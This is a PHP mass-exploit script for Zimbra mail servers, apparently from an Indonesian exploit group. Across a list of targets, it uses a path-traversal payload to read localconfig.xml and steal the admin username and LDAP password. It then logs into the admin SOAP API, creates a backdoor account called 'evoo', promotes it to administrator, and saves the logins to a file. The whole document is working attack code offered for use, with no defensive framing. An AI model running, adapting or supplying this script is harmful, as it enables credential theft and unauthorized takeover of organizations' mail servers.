Zimbra mass exploit

1. <?php
2. // Created by L3xcode - CybeerXploit
3. // big thx to: magn0m.
4. // Recoded By : l3xcode
5.  
6.  
7. error_reporting(0);
8. function ambilKata($param, $kata1, $kata2){
9. if(strpos($param, $kata1) === FALSE) return FALSE;
10. if(strpos($param, $kata2) === FALSE) return FALSE;
11. $start = strpos($param, $kata1) + strlen($kata1);
12. $end = strpos($param, $kata2, $start);
13. $return = substr($param, $start, $end - $start);
14. return $return;
15. }
16.  
17. function ngecek($url,$post){
18. $ch = curl_init ("$url");
19. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
20. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
21. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
22. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
23. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
24. curl_setopt ($ch, CURLOPT_POST, 1);
25. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
26. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
27. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
28. $data2 = curl_exec ($ch);
29. return $data2;
30. }
31.  
32. function nganu_body($toket,$req){
33. $body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra
34.  
35. \"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
36. return $body;
37. }
38. if($argv[1]==""){
39. echo "\nusage: php exploit.php list.txt\n\n";
40. }
41. else{
42. $target=@file_get_contents($argv[1]);
43. $ss=explode("\r\n",$target);
44. foreach ($ss as $links){
45.  
46. $user_baru = "evoo";
47. $pwd_baru = "evoo";
48. $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?
49.  
50. v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
51. $link_lfi = "$links/$lfi";
52. echo "=> $links\n";
53.  
54. $ch2 = curl_init ("$link_lfi");
55. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
56. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
57. curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101
58.  
59. Firefox/32.0");
60. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
61. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
62. curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
63. curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
64. curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
65. $ambil = curl_exec ($ch2);
66.  
67. $get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
68. preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);
69.  
70. $get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
71. preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
72. if($user[1] or $pwd[1] != ""){
73. echo "[+] Pulen nih...\n";
74.  
75. $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
76. <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\"
77.  
78. xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user
79.  
80. [1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
81.  
82. $link = "https://$target:7071/service/admin/soap";
83. $token = ngecek($link,$body);
84.  
85. preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);
86.  
87. if($toket[1]==""){
88. echo "[-] gagal ngambil token\n\n";
89. break;
90. }
91. else{
92. $req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin
93.  
94. \"></GetAllDomainsRequest>");
95. $body2 = nganu_body($toket[1],$req);
96.  
97. $liat = ngecek($link,$body2);
98. preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
99. echo "[+] Creating Account...\n";
100. $req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain
101.  
102. [1]</name><password>$pwd_baru</password></CreateAccountRequest>";
103. $body3 = nganu_body($toket[1],$req2);
104.  
105. $liat2 = ngecek($link,$body3);
106.  
107. preg_match('/account id="(.*)" name="/', $liat2, $new);
108. $req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=
109.  
110. \"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
111. $body4 = nganu_body($toket[1],$req3);
112.  
113. $liat3 = ngecek($link,$body4);
114.  
115.  
116. echo "[+] Sukses\n";
117. echo "[+] Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@
118.  
119. $domain[1]\n# Password: $pwd_baru\n\n";
120. $fp = fopen('hasil.txt', 'a+');
121. fwrite($fp, "[+] Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password:
122.  
123. $pwd_baru\n\n");
124. fclose($fp);
125.  
126.  
127.  
128. }
129. }
130. else{
131. echo "[-] ngk pulen\n";
132. }
133. }
134. }
135. ?>